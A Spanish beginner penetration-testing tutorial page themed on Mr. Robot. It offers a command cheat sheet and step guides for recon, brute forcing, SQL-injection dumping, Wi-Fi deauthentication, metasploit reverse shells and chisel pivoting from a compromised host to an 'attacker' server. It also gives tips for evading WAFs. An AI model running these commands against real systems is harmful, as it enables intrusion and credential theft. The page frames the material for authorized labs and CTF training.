modo entrenamiento fsociety

Hacking ético para principiantes

Canaliza tu curiosidad como Elliot Alderson: aprende a mapear objetivos, descubrir vulnerabilidades y ejecutar pruebas responsables sin perder el control.

session@fsociety:~$

$ sudo apt install kali-tools-top10
$ nmap -sC -sV 10.10.11.5
$ python3 -m http.server 9001
$ nc -lvnp 4444
        

Ruta de aprendizaje

  • Configura tu laboratorio
  • Practica recon y escaneo
  • Automatiza con scripts
  • Documenta hallazgos

NO HAY ATAJOS · SOLO DISCIPLINA · HACKING ÉTICO O NADA · PRACTICA EN ENTORNOS AUTORIZADOS

Esenciales de Linux

Comandos básicos de hacking

Domina estas utilidades para moverte con soltura en auditorías y CTFs.

nmap

Escáner de red imprescindible para descubrir hosts, puertos y servicios antes de atacar.

  • Cuándo usarlo: fase de reconocimiento activo y validación de superficie de ataque.
  • Flags clave: -sC ejecuta scripts NSE básicos, -sV detecta versiones, -oN guarda resultados en texto.
  • Consejo: empieza con un barrido rápido -T4 y luego afina con scripts específicos (--script vuln).
nmap -sC -sV -T4 -oN escaneo.txt 192.168.1.0/24

netcat

Herramienta multiuso para crear sockets TCP/UDP, transferir archivos y establecer shells reversos.

  • Cuándo usarlo: pruebas rápidas de conectividad, tunelización temporal y escucha de puertos.
  • Truco: combina nc con /bin/bash para abrir shells remotos o con pv para copiar ficheros grandes.
  • Seguridad: usa versiones con opción -e solo en laboratorios controlados.
nc -lvnp 9001            # escucha interactiva
nc 10.10.10.5 9001 -v    # conexión desde el atacante

hydra

Lanzador de fuerza bruta paralela que soporta más de 50 protocolos para romper credenciales débiles.

  • Cuándo usarlo: tras enumerar usuarios válidos (SMTP, SSH, FTP, HTTP-Auth).
  • Flags clave: -L/-l lista/usuario, -P/-p diccionario/clave, -t hilos concurrentes.
  • Consejo: limita intentos con -W para no disparar mecanismos de defensa y registra resultados con -o.
hydra -L users.txt -P pass.txt -t 4 ssh://10.0.0.7

john the ripper

Framework de cracking que acepta múltiples formatos de hash y permite reglas personalizadas.

  • Cuándo usarlo: post-explotación para romper hashes de /etc/shadow o volcados de AD.
  • Pasos: 1) convertir con john --format o zip2john, 2) lanzar diccionario, 3) aplicar reglas incrementales.
  • Consejo: revisa el progreso con john --status y muestra resultados con john --show hashes.txt.
john --wordlist=rockyou.txt --rules=best64 hashes.txt

tcpdump

Sniffer ligero para capturar paquetes y filtrar protocolos sin necesidad de un GUI pesado como Wireshark.

  • Cuándo usarlo: análisis en vivo, respuesta rápida o cuando solo tienes acceso vía consola.
  • Filtros útiles: port 80, host 10.10.10.5, tcp[tcpflags] & tcp-syn != 0.
  • Consejo: guarda capturas con -w para revisarlas luego con Wireshark y usa -nn para ver puertos/IP sin resolver.
sudo tcpdump -i wlan0 -nn port 80 -w captura.pcap

airmon-ng & aireplay-ng

Parte de Aircrack-ng, permiten poner tu tarjeta Wi-Fi en modo monitor y forzar handshakes WPA/WPA2.

  • Cuándo usarlo: auditorías inalámbricas, verificación de configuraciones y recopilación de handshakes.
  • Flujo rápido: 1) habilita modo monitor, 2) captura tráfico con airodump-ng, 3) desautentica clientes con aireplay-ng.
  • Consejo: usa antenas con buen dBi, controla la potencia con txpower y documenta el canal antes de lanzar ataques.
sudo airmon-ng start wlan0
sudo aireplay-ng -0 10 -a <BSSID> -c <CLIENTE> wlan0mon

gobuster

Fuzzer de rutas y subdominios que ayuda a encontrar paneles ocultos y buckets expuestos.

  • Modos: dir para directorios, dns para subdominios, vhost para virtual hosts.
  • Consejo: combina diccionarios específicos (raft-small) y cabeceras personalizadas para evadir WAF.
  • Flag útil: -x php,txt,conf fuerza extensiones comunes.
gobuster dir -u https://target -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt

sqlmap

Automatiza la explotación de inyecciones SQL, exfiltra datos y obtiene shells.

  • Cuándo usarlo: tras detectar parámetros sospechosos (id=1, formularios).
  • Flags clave: --batch modo automático, --dump extrae tablas, --os-shell intenta una shell.
  • Consejo: utiliza --risk y --level gradualmente para no saturar el servidor.
sqlmap -u "https://target/app.php?id=2" --cookie="PHPSESSID=xyz" --risk=2 --level=3 --dump

metasploit-framework

Suite modular con exploits, payloads y post módulos para automatizar escenarios complejos.

  • Cuándo usarlo: cuando necesitas exploits listos para CVEs conocidos o pivoting rápido.
  • Workflow: searchuseset RHOSTS/set LHOSTrun.
  • Consejo: crea recursos .rc para repetir sesiones y mantén tu base actualizada con msfupdate.
msfconsole -q -x "use exploit/multi/handler; set PAYLOAD linux/x86/meterpreter/reverse_tcp; set LHOST tun0; set LPORT 9001; run"

burp suite

Proxy interceptador para pruebas web; permite manipular peticiones, automatizar scans y extender con BApps.

  • Cuándo usarlo: testeo de APIs, sesiones y validaciones de inputs.
  • Tips: usa Repeater para fuzz manual, Intruder para ataques controlados y guarda perfiles de scope.
  • Alternativa CLI: burp suite community combinada con ffuf y curl.
java -jar burpsuite_community.jar

wireshark / tshark

Analizadores de tráfico con filtros potentes para entender protocolos y detectar fugas.

  • Tshark: versión CLI ideal para servidores o automatización.
  • Filtros: http.request.method == "POST", ssl.handshake, dns.qry.name contains "admin".
  • Consejo: exporta flujos con Export Objects o tshark -z follow,tcp,ascii,NUM.
tshark -i eth0 -Y "http.request" -w http_capture.pcap

linpeas.sh

Script de post-explotación que enumera privilegios, binarios SUID y configuraciones débiles en Linux.

  • Cuándo usarlo: luego de obtener acceso a un host y querer escalar privilegios.
  • Tip: ejecútalo con sh linpeas.sh | tee linpeas.log para guardar todo.
  • Respeta: limpia cualquier descarga que dejes en la máquina auditada.
wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
chmod +x linpeas.sh && ./linpeas.sh

chisel

Túnel TCP basado en WebSockets para pivotar a redes internas cuando solo tienes salida HTTP/HTTPS.

  • Uso típico: inicia servidor en tu host, cliente en la máquina comprometida.
  • Modos: --reverse abre puertos desde dentro hacia fuera.
  • Alternativa: ssh -R o sshuttle si tienes credenciales válidas.
# atacante
./chisel server -p 8000 --reverse
# víctima comprometida
./chisel client attacker:8000 R:1080:sockspy

Paso a paso

Tutoriales rápidos de pentesting

Sigue estas guías resumidas para practicar sin perderte.

1. Reconocimiento activo

  • Mapea la red con ip a y nmap -sn.
  • Identifica servicios expuestos con escaneos versión (-sV).
  • Documenta puertos abiertos y banners interesantes.

2. Enumeración de servicios

  • Usa scripts NSE (--script vuln) para detectar fallos conocidos.
  • Enumera SMB con enum4linux o smbclient -L.
  • Revisa directorios ocultos con gobuster dir -u URL -w wordlist.

3. Explotación controlada

  • Replica el servicio vulnerable en tu laboratorio.
  • Analiza exploits en Exploit-DB y adapta el payload.
  • Valida las precondiciones (versiones, puertos, dependencias) antes de ejecutar.

4. Post-explotación

  • Escala privilegios con linpeas.sh o linenum.sh.
  • Configura un ssh -R o chisel para pivotar si es necesario.
  • Recopila evidencia y prepara el informe técnico.

fsociety visuals

Atmósfera Mr. Robot

Sumérgete en el mood de la serie para recordar que cada auditoría necesita enfoque, sigilo y documentación impecable.

01 / Elliot Observa el código desde la sombra. Cada monitor refleja tu siguiente movimiento.
02 / Fsociety HQ Tableros, máscaras y terminales sincronizadas para coordinar ataques autorizados.
03 / Darknet Ops Mantén tus notas cifradas y tus logs versionados: transparencia interna, opacidad externa.
04 / Máscara icónica Recuerda: el disfraz es simbólico. Lo importante es la ética detrás de cada comando.
«El poder real no está en los servidores. Está en quien entiende cómo funcionan». — Manifiesto fsociety

Mantén tu stack actualizado, registra cada comando ejecutado y nunca ataques fuera de entornos con autorización expresa.

Hands-on

Prácticas guiadas

Escenarios sencillos para aplicar lo aprendido sin salir de un entorno controlado.

Laboratorio local con máquinas vulnerables

Descarga imágenes como Metasploitable o OWASP Broken Web Apps y ejecútalas en VirtualBox/VMware.

  1. Configura una red interna y asigna IPs fijas.
  2. Escanea desde tu máquina atacante (Kali/Parrot).
  3. Documenta vector de entrada, explotación y mitigaciones.

CTF semanal

Elige un desafío fácil de plataformas como TryHackMe (ruta "Complete Beginner") o Hack The Box Academy.

  1. Lee el briefing del reto y define objetivos.
  2. Resuelve cada fase tomando notas con Markdown.
  3. Publica un writeup privado para afianzar el proceso.

Automatiza tus notas

Crea un repositorio privado con plantillas para reportes: recon, explotación y post-explotación.

  1. Diseña scripts en Bash o Python que exporten resultados (nmap, enum4linux).
  2. Integra herramientas como Obsidian o MkDocs para documentar.
  3. Versiona tu progreso y revisa semanalmente.